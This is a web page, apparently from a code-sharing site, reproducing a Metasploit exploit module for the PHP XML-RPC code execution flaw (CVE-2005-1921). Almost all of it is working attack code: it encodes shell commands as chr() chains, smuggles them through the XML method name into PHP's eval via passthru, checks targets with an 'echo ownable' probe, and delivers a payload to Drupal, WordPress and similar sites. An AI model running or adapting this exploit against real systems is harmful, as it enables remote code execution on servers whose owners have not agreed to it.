扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 |
## # $Id: php_xmlrpc_eval.rb 9929 2010-07-25 21:37:54Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient # XXX This module needs an overhaul def initialize(info = {}) super(update_info(info, 'Name' => 'PHP XML-RPC Arbitrary Code Execution', 'Description'=> %q{ This module exploits an arbitrary code execution flaw discovered in many implementations of the PHP XML-RPC module. This flaw is exploitable through a number of PHP web applications, including but not limited to Drupal, WordPress, Postnuke, and TikiWiki. }, 'Author' => [ 'hdm', 'cazz' ], 'License'=> MSF_LICENSE, 'Version'=> '$Revision: 9929 $', 'References' => [ ['CVE', '2005-1921'], ['OSVDB', '17793'], ['BID', '14088'], ], 'Privileged' => false, 'Platform' => ['unix', 'solaris'], 'Payload'=> { 'Space' => 512, 'DisableNops' => true, 'Keys'=> ['cmd', 'cmd_bash'], }, 'Targets'=> [ ['Automatic', { }], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 29 2005' )) register_options( [ OptString.new('PATH', [ true,"Path to xmlrpc.php", '/xmlrpc.php']), ], self.class) deregister_options( 'HTTP::junk_params', # not your typical POST, so don't inject params. 'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now. ) end def go(command) encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.') wrapper = rand_text_alphanumeric(rand(128)+32) cmd = "echo('#{wrapper}'); passthru(#{ encoded }); echo('#{wrapper}');;" xml = '<?xml version="1.0"?>' + "<methodCall>" + "<methodName>"+ rand_text_alphanumeric(rand(128)+32) + "</methodName>" + "<params><param>" + "<name>" + rand_text_alphanumeric(rand(128)+32) + "');#{cmd}//</name>" + "<value>" + rand_text_alphanumeric(rand(128)+32) + "</value>" + "</param></params>" + "</methodCall>"; res = send_request_cgi({ 'uri'=> datastore['PATH'], 'method' => 'POST', 'ctype'=> 'application/xml', 'data' => xml, }, 5) if (res and res.body) b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body) if b return b.captures[0] elsif datastore['HTTP::chunked'] == true b = /chunked Transfer-Encoding forbidden/.match(res.body) if b raise RuntimeError, 'Target PHP installation does not support chunked encoding.Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.' end end end return nil end def check response = go("echo ownable") if (!response.nil? and response =~ /ownable/sm) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit response = go(payload.encoded) if response == nil print_error('exploit failed: no response') else if response.length == 0 print_status('exploit successful') else print_status("Command returned #{response}") end handler end end end |
体验盒子
